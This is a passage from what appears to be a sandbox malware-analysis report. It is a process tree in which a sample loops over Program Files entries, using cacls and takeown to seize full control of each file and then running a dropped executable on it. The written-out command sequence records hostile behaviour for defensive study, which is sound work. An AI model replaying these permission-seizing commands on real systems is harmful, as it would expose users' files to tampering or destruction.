C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵
- Loads dropped DLL
PID:1644 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵
- Loads dropped DLL
PID:2036 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Genko_2.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Genko_2.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1492
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵
- Loads dropped DLL
PID:972 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "wab.exe" -nobanner3⤵
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵
- Loads dropped DLL
PID:1232 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "forms_distributed.gif" -nobanner3⤵
- Loads dropped DLL
PID:796 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "forms_distributed.gif" -nobanner4⤵
- Executes dropped EXE
PID:2040
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵
- Loads dropped DLL
PID:1824 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:1640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "reviews_sent.gif" -nobanner3⤵
- Loads dropped DLL
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "reviews_sent.gif" -nobanner4⤵
- Executes dropped EXE
PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵
- Loads dropped DLL
PID:1032 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "stop_collection_data.gif" -nobanner3⤵
- Loads dropped DLL
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "stop_collection_data.gif" -nobanner4⤵
- Executes dropped EXE
PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵
- Loads dropped DLL
PID:1944 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ReadMe.htm" -nobanner3⤵
- Loads dropped DLL
PID:472 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ReadMe.htm" -nobanner4⤵
- Executes dropped EXE
PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
PID:796 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:1136 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵
- Loads dropped DLL
PID:1092 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ZX______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ZX______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵
- Loads dropped DLL
PID:1808 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:1868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "brt04.hsp" -nobanner3⤵
- Loads dropped DLL
PID:436 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "brt04.hsp" -nobanner4⤵
- Executes dropped EXE
PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵
- Loads dropped DLL
PID:796 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:1060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "engphon.env" -nobanner3⤵
- Loads dropped DLL
PID:220 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "engphon.env" -nobanner4⤵
- Executes dropped EXE
PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵
- Loads dropped DLL
PID:1684 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵
- Executes dropped EXE
PID:360
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵
- Loads dropped DLL
PID:1228 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1250.TXT" -nobanner3⤵
- Loads dropped DLL
PID:920 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1250.TXT" -nobanner4⤵
- Executes dropped EXE
PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1120 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵
- Loads dropped DLL
PID:208 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:1020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵
- Modifies file permissions
PID:1868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "RTC.der" -nobanner3⤵
- Loads dropped DLL
PID:680 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "RTC.der" -nobanner4⤵
- Executes dropped EXE
PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵
- Loads dropped DLL
PID:972 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "end_review.gif" -nobanner3⤵
- Loads dropped DLL
PID:908 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "end_review.gif" -nobanner4⤵
- Executes dropped EXE
PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵
- Loads dropped DLL
PID:1944 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "reviews_joined.gif" -nobanner3⤵
- Loads dropped DLL
PID:624 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "reviews_joined.gif" -nobanner4⤵
- Executes dropped EXE
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵
- Loads dropped DLL
PID:1956 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "server_ok.gif" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "server_ok.gif" -nobanner4⤵
- Executes dropped EXE
PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵
- Loads dropped DLL
PID:1340 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵
- Modifies file permissions
PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "warning.gif" -nobanner3⤵
- Loads dropped DLL
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "warning.gif" -nobanner4⤵
- Executes dropped EXE
PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵
- Loads dropped DLL
PID:1936 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵
- Loads dropped DLL
PID:920 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "SY______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "brt.hyp" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "brt.hyp" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:1136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "eng32.clx" -nobanner3⤵PID:472
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "eng32.clx" -nobanner4⤵PID:1492
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:1176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:228
-
-
